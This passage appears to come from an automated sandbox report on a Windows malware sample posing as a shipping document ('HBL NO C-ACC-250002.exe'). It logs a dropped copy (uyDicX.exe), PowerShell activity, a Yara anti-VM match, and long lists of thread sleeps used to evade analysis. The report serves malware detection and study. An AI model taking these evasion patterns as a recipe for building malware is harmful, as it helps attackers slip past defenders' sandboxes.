Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: 1340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: 2D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: 7930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: 8930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: 8AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: 9AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 7220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 8220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 83B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 93B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 2B00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 2D40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Memory allocated: 2B90000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595100	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599124
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598030
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597922
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597808
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597703
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597573
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596808
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596583
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595780
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595219
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595109
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595000
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 594562

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7163	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 715	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8055	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 888	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Window / User API: threadDelayed 2036	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Window / User API: threadDelayed 7786	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Window / User API: threadDelayed 2371
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Window / User API: threadDelayed 7489

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 2296	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3556	Thread sleep count: 7163 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3556	Thread sleep count: 715 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6508	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5988	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 5268	Thread sleep count: 2036 > 30	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 5268	Thread sleep count: 7786 > 30	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -595100s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 7060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 4460	Thread sleep count: 2371 > 30
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 4460	Thread sleep count: 7489 > 30
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -599124s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -599015s >= -30000s
